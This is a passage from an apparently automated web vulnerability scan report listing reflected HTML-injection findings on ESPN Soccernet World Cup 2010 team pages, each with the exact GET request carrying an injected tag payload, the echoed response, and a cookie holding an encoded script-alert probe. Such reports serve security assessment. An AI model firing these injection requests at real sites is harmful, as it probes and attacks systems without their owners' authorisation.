s_pers=%20s_c24%3D1289020630042%7C1383628630042%3B%20s_c24_s%3DFirst%2520Visit%7C1289022430042%3B%20s_gpv_pn%3Dsoccernet%253Aworldcup2010%253Aindex%7C1289022430076%3B; espn360=false; RegTrackX=/insider/news/rumor central - mlb|local|not specified|not specified; DS=dGhlcGxhbmV0LmNvbTs3MzczMDQ7dGhlcGxhbmV0LmNvbSBpbnRlcm5ldCBzZXJ2aWNlcyBpbmMuOw==; s_vi=[CS]v1|266A6FBD05013105-60000110E0002F8F[CE]; worldcupversion=us; CP=null*; CRBLM=CBLM-001:; AcceptCookies=yes; COREG=5901; SWID=53406FAA-0429-45ED-9ACF-3C114582784B; SEEN2=cAMLBtEO:;
Response
HTTP/1.1 200 OK Cache-Control: max-age=300 Date: Sat, 06 Nov 2010 23:10:00 GMT Content-Type: text/html; charset=iso-8859-1 Last-Modified: Sat, 06 Nov 2010 23:10:00 GMT Server: Microsoft-IIS/6.0 P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE" From: ESPN01 Cache-Expires: Sat, 06 Nov 2010 23:15:00 GMT Content-Length: 81725 Connection: close Via: 8810-07/08 X-UA-Compatible: IE=EmulateIE7 Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Ghana Football / So ...[SNIP]... <a href="/worldcup2010/team?team=4469&_slug_=ghana3b56f"><a>36f0e92eb87&topId=805277&linktext=Ghana+crushed%2C+Uruguay+through"> ...[SNIP]...
5.78. http://soccernet.espn.go.com/worldcup2010/team/_/team/4469/ghana [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Firm
Host:
http://soccernet.espn.go.com
Path:
/worldcup2010/team/_/team/4469/ghana
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload aea54"><a>47a90bab802 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /worldcup2010/team/_/team/4469/ghana?aea54"><a>47a90bab802=1 HTTP/1.1 Host: soccernet.espn.go.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: TSC=1; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221289019231707_594159%22%2C%22ru%22%3A%22http%3A%2F%2Finsider.espn.go.com%2Finsider%2Frumorcentral%3F39322%2522%253E%253Cscript%253Ealert(1)%253C%2Fscript%253E526b434719f%3D%22%2C%22r%22%3A%22insider.espn.go.com%22%2C%22st%22%3A%22%22%2C%22pv%22%3A3%2C%22to%22%3A5%2C%22c%22%3A%22http%3A%2F%2Fsoccernet.espn.go.com%2Fworldcup%2F%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A3%2C%22s%22%3Afalse%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22f%22%3A1289019278268%7D; jt_time=1289020630363; s_sess=%20s_ppv%3D83%3B%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B%20s_sq%3D%3B; fsr.a=1289020662234; CRBLM_LAST_UPDATE=1289020821; lang=en; userAB=7; soccerNetIndex=true; mbox=session#1289020509579-435223#1289022520|check#true#1289020720; broadbandAccess=espn3-false%2Cnetworks-false; DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; s_pers=%20s_c24%3D1289020630042%7C1383628630042%3B%20s_c24_s%3DFirst%2520Visit%7C1289022430042%3B%20s_gpv_pn%3Dsoccernet%253Aworldcup2010%253Aindex%7C1289022430076%3B; espn360=false; RegTrackX=/insider/news/rumor central - mlb|local|not specified|not specified; DS=dGhlcGxhbmV0LmNvbTs3MzczMDQ7dGhlcGxhbmV0LmNvbSBpbnRlcm5ldCBzZXJ2aWNlcyBpbmMuOw==; s_vi=[CS]v1|266A6FBD05013105-60000110E0002F8F[CE]; worldcupversion=us; CP=null*; CRBLM=CBLM-001:; AcceptCookies=yes; COREG=5901; SWID=53406FAA-0429-45ED-9ACF-3C114582784B; SEEN2=cAMLBtEO:;
Response
HTTP/1.1 200 OK Cache-Control: max-age=300 Date: Sat, 06 Nov 2010 23:08:43 GMT Content-Type: text/html; charset=iso-8859-1 Last-Modified: Sat, 06 Nov 2010 23:08:43 GMT Server: Microsoft-IIS/6.0 P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE" From: ESPN11 Cache-Expires: Sat, 06 Nov 2010 23:13:42 GMT Content-Length: 81833 Connection: close Via: 8810-07/08 X-UA-Compatible: IE=EmulateIE7 Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Ghana Football / So ...[SNIP]... <a href="/worldcup2010/team?team=4469&aea54"><a>47a90bab802=1&_slug_=ghana&aea54"> ...[SNIP]...
The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 139f9"><a>a59e25551c6 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /worldcup2010/team/_/team/448/england139f9"><a>a59e25551c6 HTTP/1.1 Host: soccernet.espn.go.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: TSC=1; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221289019231707_594159%22%2C%22ru%22%3A%22http%3A%2F%2Finsider.espn.go.com%2Finsider%2Frumorcentral%3F39322%2522%253E%253Cscript%253Ealert(1)%253C%2Fscript%253E526b434719f%3D%22%2C%22r%22%3A%22insider.espn.go.com%22%2C%22st%22%3A%22%22%2C%22pv%22%3A3%2C%22to%22%3A5%2C%22c%22%3A%22http%3A%2F%2Fsoccernet.espn.go.com%2Fworldcup%2F%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A3%2C%22s%22%3Afalse%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22f%22%3A1289019278268%7D; jt_time=1289020630363; s_sess=%20s_ppv%3D83%3B%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B%20s_sq%3D%3B; fsr.a=1289020662234; CRBLM_LAST_UPDATE=1289020821; lang=en; userAB=7; soccerNetIndex=true; mbox=session#1289020509579-435223#1289022520|check#true#1289020720; broadbandAccess=espn3-false%2Cnetworks-false; DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; s_pers=%20s_c24%3D1289020630042%7C1383628630042%3B%20s_c24_s%3DFirst%2520Visit%7C1289022430042%3B%20s_gpv_pn%3Dsoccernet%253Aworldcup2010%253Aindex%7C1289022430076%3B; espn360=false; RegTrackX=/insider/news/rumor central - mlb|local|not specified|not specified; DS=dGhlcGxhbmV0LmNvbTs3MzczMDQ7dGhlcGxhbmV0LmNvbSBpbnRlcm5ldCBzZXJ2aWNlcyBpbmMuOw==; s_vi=[CS]v1|266A6FBD05013105-60000110E0002F8F[CE]; worldcupversion=us; CP=null*; CRBLM=CBLM-001:; AcceptCookies=yes; COREG=5901; SWID=53406FAA-0429-45ED-9ACF-3C114582784B; SEEN2=cAMLBtEO:;
Response
HTTP/1.1 200 OK Cache-Control: max-age=300 Date: Sat, 06 Nov 2010 23:09:11 GMT Content-Type: text/html; charset=iso-8859-1 Last-Modified: Sat, 06 Nov 2010 23:09:11 GMT Server: Microsoft-IIS/6.0 P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE" From: ESPN21 Cache-Expires: Sat, 06 Nov 2010 23:14:10 GMT Content-Length: 80274 Connection: close Via: 8810-07/08 X-UA-Compatible: IE=EmulateIE7 Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>England Football / ...[SNIP]... <a href="/worldcup2010/team?team=448&_slug_=england139f9"><a>a59e25551c6&topId=805083&linktext=FA+confirms+Capello+will+stay+on"> ...[SNIP]...
5.80. http://soccernet.espn.go.com/worldcup2010/team/_/team/448/england [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Firm
Host:
http://soccernet.espn.go.com
Path:
/worldcup2010/team/_/team/448/england
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d6170"><a>7607dfaf4a2 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /worldcup2010/team/_/team/448/england?d6170"><a>7607dfaf4a2=1 HTTP/1.1 Host: soccernet.espn.go.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: TSC=1; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221289019231707_594159%22%2C%22ru%22%3A%22http%3A%2F%2Finsider.espn.go.com%2Finsider%2Frumorcentral%3F39322%2522%253E%253Cscript%253Ealert(1)%253C%2Fscript%253E526b434719f%3D%22%2C%22r%22%3A%22insider.espn.go.com%22%2C%22st%22%3A%22%22%2C%22pv%22%3A3%2C%22to%22%3A5%2C%22c%22%3A%22http%3A%2F%2Fsoccernet.espn.go.com%2Fworldcup%2F%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A3%2C%22s%22%3Afalse%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22f%22%3A1289019278268%7D; jt_time=1289020630363; s_sess=%20s_ppv%3D83%3B%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B%20s_sq%3D%3B; fsr.a=1289020662234; CRBLM_LAST_UPDATE=1289020821; lang=en; userAB=7; soccerNetIndex=true; mbox=session#1289020509579-435223#1289022520|check#true#1289020720; broadbandAccess=espn3-false%2Cnetworks-false; DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; s_pers=%20s_c24%3D1289020630042%7C1383628630042%3B%20s_c24_s%3DFirst%2520Visit%7C1289022430042%3B%20s_gpv_pn%3Dsoccernet%253Aworldcup2010%253Aindex%7C1289022430076%3B; espn360=false; RegTrackX=/insider/news/rumor central - mlb|local|not specified|not specified; DS=dGhlcGxhbmV0LmNvbTs3MzczMDQ7dGhlcGxhbmV0LmNvbSBpbnRlcm5ldCBzZXJ2aWNlcyBpbmMuOw==; s_vi=[CS]v1|266A6FBD05013105-60000110E0002F8F[CE]; worldcupversion=us; CP=null*; CRBLM=CBLM-001:; AcceptCookies=yes; COREG=5901; SWID=53406FAA-0429-45ED-9ACF-3C114582784B; SEEN2=cAMLBtEO:;
Response
HTTP/1.1 200 OK Cache-Control: max-age=300 Date: Sat, 06 Nov 2010 23:07:48 GMT Content-Type: text/html; charset=iso-8859-1 Last-Modified: Sat, 06 Nov 2010 23:07:48 GMT Server: Microsoft-IIS/6.0 P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE" From: ESPN20 Cache-Expires: Sat, 06 Nov 2010 23:12:48 GMT Content-Length: 80382 Connection: close Via: 8810-07/08 X-UA-Compatible: IE=EmulateIE7 Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>England Football / ...[SNIP]... <a href="/worldcup2010/team?team=448&d6170"><a>7607dfaf4a2=1&_slug_=england&d6170"> ...[SNIP]...
The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7a26e"><a>ecad0508930 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /worldcup2010/team/_/team/449/netherlands7a26e"><a>ecad0508930 HTTP/1.1 Host: soccernet.espn.go.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: TSC=1; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221289019231707_594159%22%2C%22ru%22%3A%22http%3A%2F%2Finsider.espn.go.com%2Finsider%2Frumorcentral%3F39322%2522%253E%253Cscript%253Ealert(1)%253C%2Fscript%253E526b434719f%3D%22%2C%22r%22%3A%22insider.espn.go.com%22%2C%22st%22%3A%22%22%2C%22pv%22%3A3%2C%22to%22%3A5%2C%22c%22%3A%22http%3A%2F%2Fsoccernet.espn.go.com%2Fworldcup%2F%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A3%2C%22s%22%3Afalse%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22f%22%3A1289019278268%7D; jt_time=1289020630363; s_sess=%20s_ppv%3D83%3B%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B%20s_sq%3D%3B; fsr.a=1289020662234; CRBLM_LAST_UPDATE=1289020821; lang=en; userAB=7; soccerNetIndex=true; mbox=session#1289020509579-435223#1289022520|check#true#1289020720; broadbandAccess=espn3-false%2Cnetworks-false; DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; s_pers=%20s_c24%3D1289020630042%7C1383628630042%3B%20s_c24_s%3DFirst%2520Visit%7C1289022430042%3B%20s_gpv_pn%3Dsoccernet%253Aworldcup2010%253Aindex%7C1289022430076%3B; espn360=false; RegTrackX=/insider/news/rumor central - mlb|local|not specified|not specified; DS=dGhlcGxhbmV0LmNvbTs3MzczMDQ7dGhlcGxhbmV0LmNvbSBpbnRlcm5ldCBzZXJ2aWNlcyBpbmMuOw==; s_vi=[CS]v1|266A6FBD05013105-60000110E0002F8F[CE]; worldcupversion=us; CP=null*; CRBLM=CBLM-001:; AcceptCookies=yes; COREG=5901; SWID=53406FAA-0429-45ED-9ACF-3C114582784B; SEEN2=cAMLBtEO:;
Response
HTTP/1.1 200 OK Cache-Control: max-age=300 Date: Sat, 06 Nov 2010 23:24:22 GMT Content-Type: text/html; charset=iso-8859-1 Last-Modified: Sat, 06 Nov 2010 23:24:22 GMT Server: Microsoft-IIS/6.0 P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE" From: ESPN21 Cache-Expires: Sat, 06 Nov 2010 23:29:22 GMT Content-Length: 81781 Connection: close Via: 8810-09/10 X-UA-Compatible: IE=EmulateIE7 Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Netherlands Footbal ...[SNIP]... <a href="/worldcup2010/team?team=449&_slug_=netherlands7a26e"><a>ecad0508930&topId=808125&linktext=Andres+Iniesta+fires+Spain+to+glory"> ...[SNIP]...
5.82. http://soccernet.espn.go.com/worldcup2010/team/_/team/449/netherlands [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Firm
Host:
http://soccernet.espn.go.com
Path:
/worldcup2010/team/_/team/449/netherlands
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload accaf"><a>fe1ec450d74 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /worldcup2010/team/_/team/449/netherlands?accaf"><a>fe1ec450d74=1 HTTP/1.1 Host: soccernet.espn.go.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: TSC=1; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221289019231707_594159%22%2C%22ru%22%3A%22http%3A%2F%2Finsider.espn.go.com%2Finsider%2Frumorcentral%3F39322%2522%253E%253Cscript%253Ealert(1)%253C%2Fscript%253E526b434719f%3D%22%2C%22r%22%3A%22insider.espn.go.com%22%2C%22st%22%3A%22%22%2C%22pv%22%3A3%2C%22to%22%3A5%2C%22c%22%3A%22http%3A%2F%2Fsoccernet.espn.go.com%2Fworldcup%2F%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A3%2C%22s%22%3Afalse%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22f%22%3A1289019278268%7D; jt_time=1289020630363; s_sess=%20s_ppv%3D83%3B%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B%20s_sq%3D%3B; fsr.a=1289020662234; CRBLM_LAST_UPDATE=1289020821; lang=en; userAB=7; soccerNetIndex=true; mbox=session#1289020509579-435223#1289022520|check#true#1289020720; broadbandAccess=espn3-false%2Cnetworks-false; DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; s_pers=%20s_c24%3D1289020630042%7C1383628630042%3B%20s_c24_s%3DFirst%2520Visit%7C1289022430042%3B%20s_gpv_pn%3Dsoccernet%253Aworldcup2010%253Aindex%7C1289022430076%3B; espn360=false; RegTrackX=/insider/news/rumor central - mlb|local|not specified|not specified; DS=dGhlcGxhbmV0LmNvbTs3MzczMDQ7dGhlcGxhbmV0LmNvbSBpbnRlcm5ldCBzZXJ2aWNlcyBpbmMuOw==; s_vi=[CS]v1|266A6FBD05013105-60000110E0002F8F[CE]; worldcupversion=us; CP=null*; CRBLM=CBLM-001:; AcceptCookies=yes; COREG=5901; SWID=53406FAA-0429-45ED-9ACF-3C114582784B; SEEN2=cAMLBtEO:;
Response
HTTP/1.1 200 OK Cache-Control: max-age=300 Date: Sat, 06 Nov 2010 23:20:01 GMT Content-Type: text/html; charset=iso-8859-1 Last-Modified: Sat, 06 Nov 2010 23:20:01 GMT Server: Microsoft-IIS/6.0 P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE" From: ESPN02 Cache-Expires: Sat, 06 Nov 2010 23:25:01 GMT Content-Length: 81889 Connection: close Via: 8810-07/08 X-UA-Compatible: IE=EmulateIE7 Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Netherlands Footbal ...[SNIP]... <a href="/worldcup2010/team?team=449&accaf"><a>fe1ec450d74=1&_slug_=netherlands&accaf"> ...[SNIP]...
The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b1e3a"><a>0e9f0d0eed8 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /worldcup2010/team/_/team/451/south-koreab1e3a"><a>0e9f0d0eed8 HTTP/1.1 Host: soccernet.espn.go.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: TSC=1; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221289019231707_594159%22%2C%22ru%22%3A%22http%3A%2F%2Finsider.espn.go.com%2Finsider%2Frumorcentral%3F39322%2522%253E%253Cscript%253Ealert(1)%253C%2Fscript%253E526b434719f%3D%22%2C%22r%22%3A%22insider.espn.go.com%22%2C%22st%22%3A%22%22%2C%22pv%22%3A3%2C%22to%22%3A5%2C%22c%22%3A%22http%3A%2F%2Fsoccernet.espn.go.com%2Fworldcup%2F%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A3%2C%22s%22%3Afalse%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22f%22%3A1289019278268%7D; jt_time=1289020630363; s_sess=%20s_ppv%3D83%3B%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B%20s_sq%3D%3B; fsr.a=1289020662234; CRBLM_LAST_UPDATE=1289020821; lang=en; userAB=7; soccerNetIndex=true; mbox=session#1289020509579-435223#1289022520|check#true#1289020720; broadbandAccess=espn3-false%2Cnetworks-false; DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; s_pers=%20s_c24%3D1289020630042%7C1383628630042%3B%20s_c24_s%3DFirst%2520Visit%7C1289022430042%3B%20s_gpv_pn%3Dsoccernet%253Aworldcup2010%253Aindex%7C1289022430076%3B; espn360=false; RegTrackX=/insider/news/rumor central - mlb|local|not specified|not specified; DS=dGhlcGxhbmV0LmNvbTs3MzczMDQ7dGhlcGxhbmV0LmNvbSBpbnRlcm5ldCBzZXJ2aWNlcyBpbmMuOw==; s_vi=[CS]v1|266A6FBD05013105-60000110E0002F8F[CE]; worldcupversion=us; CP=null*; CRBLM=CBLM-001:; AcceptCookies=yes; COREG=5901; SWID=53406FAA-0429-45ED-9ACF-3C114582784B; SEEN2=cAMLBtEO:;
Response
HTTP/1.1 200 OK Cache-Control: max-age=300 Date: Sat, 06 Nov 2010 23:29:10 GMT Content-Type: text/html; charset=iso-8859-1 Last-Modified: Sat, 06 Nov 2010 23:29:10 GMT Server: Microsoft-IIS/6.0 P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE" From: ESPN33 Cache-Expires: Sat, 06 Nov 2010 23:34:10 GMT Content-Length: 81932 Connection: close Via: 8810-09/10 X-UA-Compatible: IE=EmulateIE7 Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>South Korea Footbal ...[SNIP]... <a href="/worldcup2010/team?team=451&_slug_=south-koreab1e3a"><a>0e9f0d0eed8&topId=792536&linktext=Huh+decides+not+to+renew+contract"> ...[SNIP]...
5.84. http://soccernet.espn.go.com/worldcup2010/team/_/team/451/south-korea [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Firm
Host:
http://soccernet.espn.go.com
Path:
/worldcup2010/team/_/team/451/south-korea
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 28a78"><a>ad6c5189518 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /worldcup2010/team/_/team/451/south-korea?28a78"><a>ad6c5189518=1 HTTP/1.1 Host: soccernet.espn.go.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: TSC=1; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221289019231707_594159%22%2C%22ru%22%3A%22http%3A%2F%2Finsider.espn.go.com%2Finsider%2Frumorcentral%3F39322%2522%253E%253Cscript%253Ealert(1)%253C%2Fscript%253E526b434719f%3D%22%2C%22r%22%3A%22insider.espn.go.com%22%2C%22st%22%3A%22%22%2C%22pv%22%3A3%2C%22to%22%3A5%2C%22c%22%3A%22http%3A%2F%2Fsoccernet.espn.go.com%2Fworldcup%2F%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A3%2C%22s%22%3Afalse%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22f%22%3A1289019278268%7D; jt_time=1289020630363; s_sess=%20s_ppv%3D83%3B%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B%20s_sq%3D%3B; fsr.a=1289020662234; CRBLM_LAST_UPDATE=1289020821; lang=en; userAB=7; soccerNetIndex=true; mbox=session#1289020509579-435223#1289022520|check#true#1289020720; broadbandAccess=espn3-false%2Cnetworks-false; DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; s_pers=%20s_c24%3D1289020630042%7C1383628630042%3B%20s_c24_s%3DFirst%2520Visit%7C1289022430042%3B%20s_gpv_pn%3Dsoccernet%253Aworldcup2010%253Aindex%7C1289022430076%3B; espn360=false; RegTrackX=/insider/news/rumor central - mlb|local|not specified|not specified; DS=dGhlcGxhbmV0LmNvbTs3MzczMDQ7dGhlcGxhbmV0LmNvbSBpbnRlcm5ldCBzZXJ2aWNlcyBpbmMuOw==; s_vi=[CS]v1|266A6FBD05013105-60000110E0002F8F[CE]; worldcupversion=us; CP=null*; CRBLM=CBLM-001:; AcceptCookies=yes; COREG=5901; SWID=53406FAA-0429-45ED-9ACF-3C114582784B; SEEN2=cAMLBtEO:;
Response
HTTP/1.1 200 OK Cache-Control: max-age=300 Date: Sat, 06 Nov 2010 23:27:28 GMT Content-Type: text/html; charset=iso-8859-1 Last-Modified: Sat, 06 Nov 2010 23:27:28 GMT Server: Microsoft-IIS/6.0 P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE" From: ESPN03 Cache-Expires: Sat, 06 Nov 2010 23:32:28 GMT Content-Length: 82040 Connection: close Via: 8810-09/10 X-UA-Compatible: IE=EmulateIE7 Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>South Korea Footbal ...[SNIP]... <a href="/worldcup2010/team?team=451&28a78"><a>ad6c5189518=1&_slug_=south-korea&28a78"> ...[SNIP]...
The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5bf60"><a>27f1ff77858 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
